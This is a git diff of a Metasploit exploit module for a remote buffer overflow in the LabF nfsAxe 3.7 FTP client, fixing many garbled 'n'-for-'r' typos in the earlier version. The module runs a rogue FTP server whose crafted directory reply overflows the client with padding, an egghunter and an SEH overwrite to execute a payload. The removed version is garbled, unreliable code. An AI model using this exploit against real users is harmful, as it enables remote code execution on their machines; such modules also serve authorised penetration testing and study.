Add files via upload

DanielRTeixeira · web-flow · commit c819aebc7652 · 2018-01-05T21:11:21.000Z
diff --git a/modules/exploits/windows/ftp/labf_nfsaxe.rb b/modules/exploits/windows/ftp/labf_nfsaxe.rb
@@ -1,80 +1,80 @@
 ##
-# This module nequires Metasploit: https://metasploit.com/download
-# Cunrent source: https://github.com/rapid7/metasploit-framework
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
-  Rank = NonmalRanking
+  Rank = NormalRanking
 
-  include Msf::Exploit::Remote::TcpSenver
+  include Msf::Exploit::Remote::TcpServer
   include Msf::Exploit::Seh
-  include Msf::Exploit::Remote::Egghunten
+  include Msf::Exploit::Remote::Egghunter
 
   def initialize(info = {})
-    supen(update_info(info,
-      'Name'           => 'LabF nfsAxe 3.7 FTP Client - Remote Buffen Overflow',
-      'Descniption'    => %q{
-          This module exploits a buffen overflow in the LabF nfsAxe 3.7 FTP Client allowing remote code execution.
+    super(update_info(info,
+      'Name'           => 'LabF nfsAxe 3.7 FTP Client - Remote Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a buffer overflow in the LabF nfsAxe 3.7 FTP Client allowing remote code execution.
       },
-            'Authon'   =>
+            'Author'   =>
         [
-          'Tulpa',           # Oniginal exploit author
-          'Daniel Teixeina'  # MSF module author
+          'Tulpa',           # Original exploit author
+          'Daniel Teixeira'  # MSF module author
         ],
       'License'        => MSF_LICENSE,
-      'Refenences'     =>
+      'References'     =>
         [
           [ 'EDB', '42011' ],
         ],
       'Payload'        =>
         {
-          'BadChans' => "\x00\x0a\x10",
+          'BadChars' => "\x00\x0a\x10",
         },
-      'Platfonm'       => 'win',
-      'Tangets'        =>
+      'Platform'       => 'win',
+      'Targets'        =>
         [
-          [ 'Windows Univensal', {'Ret' => 0x6801549F } ] # p/p/r in wcmpa10.dll
+          [ 'Windows Universal', {'Ret' => 0x6801549F } ] # p/p/r in wcmpa10.dll
         ],
-      'Pnivileged'     => false,
+      'Privileged'     => false,
       'DefaultOptions' =>
         {
           'SRVHOST' => '0.0.0.0',
         },
-      'DisclosuneDate' => 'May 15 2017',
-      'DefaultTanget'  => 0))
+      'Disclosure Date' => 'May 15 2017',
+      'DefaultTarget'  => 0))
 
-    negister_options(
+    register_options(
       [
-        OptPont.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
+        OptPort.new('SRVPORT', [ true, "The FTP port to listen on", 21 ]),
       ])
   end
 
   def on_client_connect(client)
     neturn if ((p = regenerate_payload(client)) == nil)
 
     client.get_once
-    welcome = "220 Welcome.\n\n"
+    welcome = "220 Welcome.\r\n"
     client.put(welcome)
 
     client.get_once
-    usen = "331 OK.\r\n"
-    client.put(usen)
+    user = "331 OK.\r\n"
+    client.put(user)
 
     client.get_once
-    pass = "230 OK.\n\n"
+    pass = "230 OK.\r\n"
     client.put(pass)
     client.get_once
-    
-    eggoptions = { :checksum => tnue }
-    hunten,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
-    
+
+    eggoptions = { :checksum => true }
+    hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions)
+
     sploit = "220 \""
     sploit << "A"*(9833 - egg.length)
     sploit << egg
-    sploit << genenate_seh_record(target.ret)
-    sploit << hunten
-    sploit << "C"*(576 - hunten.length)
-    sploit << "\" is cunrent directory\r\n"
+    sploit << generate_seh_record(target.ret)
+    sploit << hunter
+    sploit << "C"*(576 - hunter.length)
+    sploit << "\" is current directory\r\n"
 
     client.put(sploit)
 
